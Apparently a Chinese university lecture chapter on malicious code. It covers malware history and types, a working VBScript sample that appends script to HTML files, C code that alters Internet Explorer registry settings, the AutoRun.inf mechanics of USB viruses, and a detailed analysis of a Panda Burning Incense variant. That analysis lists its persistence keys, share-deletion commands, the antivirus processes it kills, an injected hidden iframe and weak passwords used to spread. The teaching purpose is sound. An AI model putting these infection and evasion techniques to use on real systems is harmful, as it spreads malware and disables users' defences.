第4章 惡意代碼課件

第4章惡意代碼大綱惡意代碼長期存在的原因

惡意代碼實現(xiàn)機理常見的惡意代碼編寫PE病毒腳本病毒宏病毒瀏覽器惡意代碼U盤病毒網(wǎng)絡蠕蟲：熊貓燒香4.1惡意代碼概述代碼是指計算機程序代碼，可以被執(zhí)行完成特定功能。任何食物事物都有正反兩面，人類發(fā)明的所有工具既可造福也可作孽，這完全取決于使用工具的人。計算機程序也不例外，軟件工程師們編寫了大量的有用的軟件（操作系統(tǒng)，應用系統(tǒng)和數(shù)據(jù)庫系統(tǒng)等）的同時，黑客們在編寫編寫擾亂社會和他人的計算機程序，這些代碼統(tǒng)稱為惡意代碼（MaliciousCodes）。4.1.1研究惡意代碼的必要性在Internet安全事件中，惡意代碼造成的經(jīng)濟損失占有最大的比例。惡意代碼主要包括計算機病毒（Virus）、蠕蟲（Worm）、木馬程序（TrojanHorse）、后門程序（Backdoor）、邏輯炸彈（LogicBomb）等等。惡意代碼問題，不僅使企業(yè)和用戶蒙受了巨大的經(jīng)濟損失，而且使國家的安全面臨著嚴重威脅。據(jù)報道，1991年的海灣戰(zhàn)爭，美國在伊拉克從第三方國家購買的打印機里植入了可遠程控制的惡意代碼，在戰(zhàn)爭打響前，使伊拉克整個計算機網(wǎng)絡管理的雷達預警系統(tǒng)全部癱瘓，這是美國第一次公開在實戰(zhàn)中使用惡意代碼攻擊技術取得的重大軍事利益。4.1.1研究惡意代碼的必要性惡意代碼攻擊成為信息戰(zhàn)、網(wǎng)絡戰(zhàn)最重要的入侵手段之一。惡意代碼問題無論從政治上、經(jīng)濟上，還是軍事上，都成為信息安全面臨的首要問題。惡意代碼的機理研究成為解決惡意代碼問題的必需途徑，只有掌握當前惡意代碼的實現(xiàn)機理，加強對未來惡意代碼趨勢的研究，才能在惡意代碼問題上取得先決之機。一個典型的例子是在電影《獨立日》中，美國空軍對外星飛船進行核轟炸沒有效果，最后給敵人飛船系統(tǒng)注入惡意代碼，使敵人飛船的保護層失效，從而拯救了地球，從中可以看出惡意代碼研究的重要性。4.1.2惡意代碼的發(fā)展史惡意代碼經(jīng)過20多年的發(fā)展，破壞性、種類和感染性都得到增強。1988年11月泛濫的Morris蠕蟲，頃刻之間使得6000多臺計算機（占當時Internet上計算機總數(shù)的10%多）癱瘓，造成嚴重的后果，并因此引起世界范圍內關注。1998年CIH病毒造成數(shù)十萬臺計算機受到破壞。1999年Happy99、Melissa病毒大爆發(fā)，Melissa病毒通過E-mail附件快速傳播而使E-mail服務器和網(wǎng)絡負載過重，它還將敏感的文檔在用戶不知情的情況下按地址簿中的地址發(fā)出。2000年5月爆發(fā)的“愛蟲”病毒及其以后出現(xiàn)的50多個變種病毒，是近年來讓計算機信息界付出極大代價的病毒，僅一年時間共感染了4000多萬臺計算機，造成大約87億美元的經(jīng)濟損失。4.1.2惡意代碼的發(fā)展史2001年，國信安辦與公安部共同主辦了我國首次計算機病毒疫情網(wǎng)上調查工作。結果感染過計算機病毒的用戶高達73％，其中，感染三次以上的用戶又占59％多，網(wǎng)絡安全存在大量隱患。2001年8月，“紅色代碼”蠕蟲利用微軟Web服務器IIS4.0或5.0中Index服務的安全漏洞，攻破目標機器，并通過自動掃描方式傳播蠕蟲，在互聯(lián)網(wǎng)上大規(guī)模泛濫。2003年，SLammer蠕蟲在10分鐘內導致互聯(lián)網(wǎng)90％脆弱主機受到感染。同年8月，“沖擊波”蠕蟲爆發(fā)，8天內導致全球電腦用戶損失高達20億美元之多。2004年到2006年，振蕩波蠕蟲、愛情后門、波特后門等惡意代碼利用電子郵件和系統(tǒng)漏洞對網(wǎng)絡主機進行瘋狂傳播，給國家和社會造成了巨大的經(jīng)濟損失。惡意代碼的發(fā)展目前，惡意代碼問題成為信息安全需要解決的，迫在眉睫的、刻不容緩的安全問題。圖7-1顯示了過去20多年主要惡意代碼事件。惡意代碼從80年代發(fā)展至今體現(xiàn)出來的3個主要特征①惡意代碼日趨復雜和完善：從非常簡單的，感染游戲的AppleII病毒發(fā)展到復雜的操作系統(tǒng)內核病毒和今天主動式傳播和破壞性極強的蠕蟲。惡意代碼在快速傳播機制和生存性技術研究取得了很大的成功。②惡意代碼編制方法及發(fā)布速度更快：惡意代碼剛出現(xiàn)時發(fā)展較慢，但是隨著網(wǎng)絡飛速發(fā)展，Internet成為惡意代碼發(fā)布并快速蔓延的平臺。特別是過去5年，不斷涌現(xiàn)的惡意代碼，證實了這一點。③從病毒到電子郵件蠕蟲，再到利用系統(tǒng)漏洞主動攻擊的惡意代碼：惡意代碼的早期，大多數(shù)攻擊行為是由病毒和受感染的可執(zhí)行文件引起的。然而，在過去5年，利用系統(tǒng)和網(wǎng)絡的脆弱性進行傳播和感染開創(chuàng)了惡意代碼的新紀元。4.1.3惡意代碼長期存在的原因系統(tǒng)漏洞層出不窮AT&T實驗室的S.Bellovin曾經(jīng)對美國CERT（ComputerEmergencyResponseTeam）提供的安全報告進行過分析，分析結果表明，大約50%的計算機網(wǎng)絡安全問題是由軟件工程中產生的安全缺陷引起的很多問題的根源都來自于操作系統(tǒng)的安全脆弱性利益驅使4.2惡意代碼實現(xiàn)機理早期惡意代碼的主要形式是計算機病毒。80年代，Cohen設計出一種在運行過程中可以復制自身的破壞性程序，Adleman將它命名為計算機病毒，它是早期惡意代碼的主要內容。Adleman把病毒定義為一個具有相同性質的程序集合，只要程序具有破壞、傳染或模仿的特點，就可認為是計算機病毒。這種定義有將病毒內涵擴大化的傾向，將任何具有破壞作用的程序都認為是病毒，掩蓋了病毒潛伏、傳染等其它重要特征4.2.1惡意代碼的相關定義經(jīng)過存儲介質和網(wǎng)絡進行傳播，從一臺計算機系統(tǒng)到另一臺計算機系統(tǒng)，未經(jīng)授權認證破壞計算機系統(tǒng)完整性的程序或代碼。特點：非授權性、破壞性4.2.1惡意代碼的相關定義惡意代碼類型定義特點計算機病毒指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù)，影響計算機使用，并能自我復制的一組計算機指令或者程序代碼。潛伏、傳染和破壞計算機蠕蟲指通過計算機網(wǎng)絡自我復制，消耗系統(tǒng)資源和網(wǎng)絡資源的程序掃描、攻擊和擴散特洛伊木馬指一種與遠程計算機建立連接，使遠程計算機能夠通過網(wǎng)絡控制本地計算機的程序。欺騙、隱蔽和信息竊取邏輯炸彈指一段嵌入計算機系統(tǒng)程序的，通過特殊的數(shù)據(jù)或時間作為條件觸發(fā)，試圖完成一定破壞功能的程序。潛伏和破壞病菌指不依賴于系統(tǒng)軟件，能夠自我復制和傳播，以消耗系統(tǒng)資源為目的的程序。傳染和拒絕服務用戶級RootKit指通過替代或者修改被系統(tǒng)管理員或普通用戶執(zhí)行的程序進入系統(tǒng)，從而實現(xiàn)隱藏和創(chuàng)建后門的程序。隱蔽，潛伏核心級RootKit指嵌入操作系統(tǒng)內核進行隱藏和創(chuàng)建后門的程序隱蔽，潛伏4.2.2惡意代碼攻擊機制4.3常見的惡意代碼這里主要介紹幾類種惡意代碼：PE病毒、腳本病毒、宏病毒、瀏覽器惡意代碼、U盤病毒和網(wǎng)絡蠕蟲。4.3.1PE病毒計算機病毒發(fā)展初期因為個人操作系統(tǒng)大多為DOS系統(tǒng)，這一時期大多為DOS病毒。由于Windows的廣泛使用，DOS病毒幾乎絕跡。但DOS病毒在Win9X環(huán)境中仍可以發(fā)生感染，因此若執(zhí)行染毒文件，Windows用戶也會被感染。DOS系統(tǒng)病毒主要分成三類：引導型病毒，文件型病毒，以及混合引導型和文件型的病毒。Win32指的是32位Windows操作系統(tǒng)，Win32的可執(zhí)行文件，如*.exe、*.dll、*.ocx等，都是PE(PortableExecutable)格式文件，意思是可移植的執(zhí)行體。感染PE格式文件的Win32病毒，簡稱為PE病毒。它感染W(wǎng)indows下所有PE格式文件，因為它通常采用Win32匯編編寫，而且格式為PE，因此得名。一個PE文件的格式使用PEExplorer對PE文件進行查看舉例：PE病毒的實現(xiàn)

4.3.2腳本病毒腳本（Script）病毒是以腳本程序語言編寫而成的病毒，主要使用的腳本語言是VBScript和JavaScript。VBScript是VisualBasicScript的簡稱，即VisualBasic腳本語言，有時也被縮寫為VBS。因為VBScript是微軟公司出品的腳本語言，因此Windows下大部分腳本病毒都使用VBS編寫。例如，愛蟲病毒、新歡樂時光病毒等都是用VBScript編寫的，稱做VBS腳本病毒。腳本病毒編寫比較簡單，并且編寫的病毒具有傳播快、破壞力大等特點。但腳本病毒必須通過Microsoft的WSH(WindowsScriptingHost，Windows腳本宿主)才能夠啟動執(zhí)行以及感染其他文件。腳本病毒VBS病毒流行的另一個原因是，VBS程序在Windows環(huán)境下運行非常方便，在文本文件中輸入代碼，將文件的保存為“*.VBS”，雙擊就可以執(zhí)行。例如在在文本文件中輸入：MsgBox"HelloVBS"，保存成“a.vbs”，雙擊就可以執(zhí)行曾經(jīng)廣為流傳的“新歡樂時光”病毒，將自己的代碼附加在HTML文件的尾部，并在頂部加入一條調用病毒代碼的語句。這里實現(xiàn)該病毒的部分感染功能，只感染病毒所在目錄下的所有HTML文件，在HTML文件后面加上代碼。代碼舉例'遇到錯誤繼續(xù)執(zhí)行Onerrorresumenext'定義變量Dimfso,curfolder,curfile'定一個文件操作對象Setfso=createobject("scripting.filesystemobject")'得到當前目錄Setcurfolder=fso.GetFolder(".")'得到當前目錄的文件setfiles=curfolder.files'文件的打開方式ConstForReading=1,ForWriting=2,ForAppending=8'向所有擴展名為htm/HTM/html/HTML的文件中寫代碼foreachfileinFilesifUCase(right(,3))="HTM"orUCase(right(,4))="HTML"then curfile=curfolder&"\"& Setf=fso.OpenTextFile(curfile,ForAppending,True)f.Writevbcrlff.Write"<scriptlanguage=""vbscript"">"&vbcrlff.Write"MsgBox""你中舊痛苦歲月病毒了！"""&vbcrlff.Write"Setr=CreateObject(""Wscript.Shell"")"&vbcrlff.Write"r.run(""notepad.exe"")"&vbcrlff.Write"</script>"endifnextf.Close4.3.3宏病毒宏病毒是單獨的一類病毒，因為它與傳統(tǒng)的病毒有很大的不同，他不感染.EXE、.COM等可執(zhí)行文件，而是將病毒代碼以“宏”的形式潛伏在Office文檔中，當采用Office軟件打開這些染毒文件時，這些代碼就會被執(zhí)行并產生破壞作用。由于“宏”是使用VBA(VisualBasicForApplication)這樣的高級語言寫的，因此其編寫過程相對來說也比較簡單，而功能又十分強大。宏病毒的產生標志著制造病毒不再是專業(yè)程序員的專利，任何人只要掌握一些基本的“宏”編寫技巧即可編寫出破壞力極大的宏病毒。隨著Office軟件在全世界的不斷普及，宏病毒成為傳播最廣泛、危害最大的一類病毒。4.3.4瀏覽器惡意代碼搜索引擎公司Google曾公布一組調查數(shù)據(jù)顯示，10%的網(wǎng)頁含有惡意代碼。Google調研人員從全球數(shù)以十億計的網(wǎng)站中抽取的450萬個網(wǎng)頁的分析測試中發(fā)現(xiàn)，至少有45萬個頁面中含有惡意腳本，即平均每十個搜尋結果里，就有一個含有可能會破壞用戶電腦的隱藏性惡意程序。而這還只是一個保守的估計，另外還有70萬個網(wǎng)頁被視為可疑頁面。國內的反病毒廠商江民科技發(fā)布了類似的數(shù)據(jù)，80％以上的用戶是因為瀏覽網(wǎng)頁而感染病毒，有近一半以上的用戶是在使用搜索引擎搜索查看信息時感染病毒，同時上正規(guī)網(wǎng)站瀏覽信息未進行其它任何操作而莫名染毒的也占到了近三成的比例。瀏覽器惡意代碼由于Windows自帶的瀏覽器InternetExplorer使用的非常廣泛，因此攻擊這個瀏覽器的惡意代碼非常多。因為瀏覽器大部分配置信息都存儲在注冊表中，所以針對瀏覽器的攻擊大多是通過修改注冊表來實現(xiàn)的。瀏覽器部分配置在HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer下，比如瀏覽器右鍵的菜單在鍵值“MenuExt”下，瀏覽器惡意代碼#include<stdio.h>#include<windows.h>main(){ HKEYhKey1; DWORDdwDisposition; LONGlRetCode; //創(chuàng)建

lRetCode=RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\InternetExplorer\\Main", 0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE, NULL,&hKey1,&dwDisposition); //如果創(chuàng)建失敗，顯示出錯信息

if(lRetCode!=ERROR_SUCCESS){ printf("Errorincreatingkey\n"); return(0);} //設置鍵值

lRetCode=RegSetValueEx(hKey1, "Default_Page_URL", 0, REG_SZ, (byte*)"", 100); //如果創(chuàng)建失敗，顯示出錯信息

if(lRetCode!=ERROR_SUCCESS){ printf("Errorinsettingvalue\n"); return(0);} printf("注冊表編寫成功！\n"); return(0);}4.3.5U盤病毒U盤病毒也稱AutoRun病毒，能通過產生的AutoRun.inf進行傳播的病毒，都可以稱為U盤病毒。隨著U盤、移動硬盤、存儲卡等移動存儲設備的普及，U盤病毒也開始泛濫。U盤病毒會在系統(tǒng)中每個磁盤目錄下創(chuàng)建AutoRun.inf病毒文件(不是所有的AutoRun.inf都是病毒文件)；借助“Windows自動播放”的特性，使用戶雙擊盤符時就可立即激活指定的病毒。病毒首先向U盤寫入病毒程序，然后更改AutoRun.inf文件。AutoRun.inf文件記錄用戶選擇何種程序來打開U盤。如果AutoRun.inf文件指向了病毒程序，那么Window就會運行這個程序，引發(fā)病毒。一般病毒還會檢測插入的U盤，并對其實行上述操作，導致一個新的病毒U盤的誕生。AutoRun.inf的關鍵字AutoRun.inf關鍵字說明[AutoRun]表示AutoRun部分開始icon=X:\“圖標”.ico給X盤一個圖標open=X:\“程序”.exe或者“命令行”雙擊X盤執(zhí)行的程序或命令shell\“關鍵字”＝“鼠標右鍵菜單中加入顯示的內容”右鍵菜單新增選項shell\“關鍵字”\command＝“要執(zhí)行的文件或命令行”對應右鍵菜單關鍵字執(zhí)行的文件U盤病毒U盤病毒病毒程序不可能明目張膽的出現(xiàn)，一般都是巧妙存在U盤中。常見的隱藏方式有：1）作為系統(tǒng)文件隱藏。一般系統(tǒng)文件是看不見的，所以這樣就達到了隱藏的效果。但這也是比較初級的?，F(xiàn)在的病毒一般不會采用這種方式。2）偽裝成其他文件。由于一般人們不會顯示文件的后綴，或者是文件名太長看不到后綴，于是有些病毒程序將自身圖標改為其他文件的圖標，導致用戶誤打開。3）藏于系統(tǒng)文件夾中。雖然感覺與第一種方式相同，但是不然。這里的系統(tǒng)文件夾往往都具有迷惑性，如文件夾名是回收站的名字。4）運用Window的漏洞。有些病毒所藏的文件夾的名字為runauto...,這個文件夾打不開，系統(tǒng)提示不存在路徑。其實這個文件夾的真正名字是runauto...\。5）隱藏文件夾，生成對應的文件夾圖標的病毒文件或者快捷方式。自己編寫U盤病毒關閉自動播放（運行：gpedit.msc）4.3.6網(wǎng)絡蠕蟲從編程角度來看，蠕蟲由兩部分組成：1.主程序。一旦在計算機中建立，就開始收集與當前計算機聯(lián)網(wǎng)的其他計算機的信息，能通過讀取公共配置文件并檢測當前計算機的聯(lián)網(wǎng)狀態(tài)信息，嘗試利用系統(tǒng)的缺陷在遠程計算機上建立引導程序2.引導程序。負責把“蠕蟲”病毒帶到它所感染的每一臺計算機中，主程序中最重要的是傳播模塊，實現(xiàn)了自動入侵的功能，U盤病毒具備蠕蟲的一些特性，也可以將其歸為蠕蟲病毒。網(wǎng)絡蠕蟲最近一次比較有代表性的蠕蟲事件，當屬2006年底感染全世界的“熊貓燒香”，一只頷首敬香的熊貓成為無數(shù)電腦用戶噩夢般的記憶，上百萬個人用戶、網(wǎng)吧及企業(yè)局域網(wǎng)用戶遭受感染和破壞，損失難以估量，曾被列為“十大病毒之首”，病毒別名有：尼姆亞，武漢男生，后又化身為“金豬報喜”，國外稱“熊貓燒香”

熊貓燒香該蠕蟲的作者李某，武漢新洲區(qū)人，中專學歷，水泥工藝專業(yè)。2006年10月16日，時年25歲的李某編寫了“熊貓燒香”病毒，它是一種經(jīng)過多次變種的蠕蟲病毒，2007年1月初肆虐網(wǎng)絡。李某于2007年2月12日被捕，因表現(xiàn)良好，獲刑4年的李某減刑一年多，于2009年12月24日出獄?！靶茇垷恪背藥в胁《镜乃刑匦酝猓€具有強烈的商業(yè)目的：可以盜取用戶游戲賬號、QQ賬號，以供出售牟利，還可以控制受感染電腦，將其變?yōu)椤熬W(wǎng)絡僵尸”，暗中訪問一些按訪問流量付費的網(wǎng)站，從而獲利，后續(xù)的部分變種中均含有網(wǎng)絡游戲盜號木馬。熊貓燒香這里分析“熊貓燒香”后續(xù)的一種變種病毒的攻擊方法，其主要表現(xiàn)為：1.病毒進程為“spoclsv.exe”，這是“熊貓燒香”早期變種之一，特別之處是“殺死殺毒軟件”，感染全盤.exe文件和刪除.gho文件（Ghost的鏡像文件）。2.在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代碼來調用病毒，目前所有專殺工具及殺毒軟件均不會修復此病毒行為，需要手動清除病毒添加的代碼，并且一定要清除，否則訪問了有此代碼的網(wǎng)頁，又會感染。3.用戶系統(tǒng)中所有.exe可執(zhí)行文件的圖標全部被改成熊貓舉著三根香的模樣。熊貓燒香其主要隱藏、感染和攻擊行為包括：1復制自身到系統(tǒng)目錄下%System%\drivers\spoclsv.exe，不同的spoclsv.exe變種，此目錄可不同。比如某變種目錄是：C:\WINDOWS\System32\Drivers\spoclsv.exe。2.創(chuàng)建啟動項[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\spoclsv.exe"3.在各分區(qū)根目錄生成病毒副本X:\setup.exeX:\autorun.infautorun.inf內容為：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell\Auto\command=setup.exe熊貓燒香4.使用netshare命令關閉管理共享cmd.exe/cnetshareX$/del/ycmd.exe/cnetshareadmin$/del/y5.修改“顯示所有文件和文件夾”設置[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]"CheckedValue"=dword:00000000熊貓燒香6.熊貓燒香病毒嘗試關閉帶如下關鍵字的安全軟件相關窗口天網(wǎng)、防火墻、進程、VirusScan、NOD32、網(wǎng)鏢、殺毒、毒霸、瑞星、江民、黃山IE、超級兔子、優(yōu)化大師、木馬清道夫、QQ病毒、注冊表編輯器、系統(tǒng)配置實用程序、卡巴斯基反病毒、SymantecAntiVirus、Duba、Windows任務管理器、esteemprocs、綠鷹PC、密碼防盜、噬菌體、木馬輔助查找器、SystemSafetyMonitor、WrappedgiftKiller、WinsockExpert、游戲木馬檢測大師、超級巡警、msctls_statusbar32、pjf(ustc)、IceSword7.嘗試結束安全軟件相關進程Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、KvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe熊貓燒香8.禁用安全軟件相關服務Schedule、sharedaccess、RsCCenter、RsRavMon、KVWSC、KVSrvXP、kavsvc、AVP、McAfeeFramework、McShield、McTaskManager、navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、SymantecCoreLC、NPFMntor、MskService、FireSvc9.刪除安全軟件相關啟動項SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTaskSOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXPSOFTWARE\Microsoft\Windows\CurrentVersion\Run\kavSOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUISOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociatesErrorReportingServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXESOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse熊貓燒香10.遍歷目錄修改htm/html/asp/php/jsp/aspx等網(wǎng)頁文件，在這些文件尾部追加信息。<iframesrc="hxxp:///wuhan/down.htm"width="0"height="0"frameborder="0"></iframe>但不修改以下目錄中的網(wǎng)頁文件：C:\WINDOWS、C:\WINNT、C:\System32、C:\DocumentsandSettings、C:\SystemVolumeInformation、C:\Recycled、ProgramFiles\WindowsNT、ProgramFiles\WindowsUpdate、ProgramFiles\WindowsMediaPlayer、ProgramFiles\OutlookExpress、ProgramFiles\InternetExplorer、ProgramFiles\NetMeeting、ProgramFiles\CommonFiles、ProgramFiles\ComPlusApplications、ProgramFiles\Messenger、ProgramFiles\InstallShieldInstallationInformation、ProgramFiles\MSN、ProgramFiles\MicrosoftFrontpage、ProgramFiles\MovieMaker、ProgramFiles\MSNGaminZone11.在訪問過的目錄下生成Desktop_.ini文件，內容為當前日期。熊貓燒香12.病毒還嘗試使用弱密碼將副本以GameSetup.exe的文件名復制到局域網(wǎng)內其它計算機中，弱密碼包括。password、harley、golf、pussy、mustang、shadow、fish、qwerty、baseball、letmein、ccc、admin、abc、pass、passwd、database、abcd、abc123、sybase、123qwe、server、computer、super、123asd、ihavenopass、godblessyou、enable、alpha、1234qwer、123abc、aaa、patric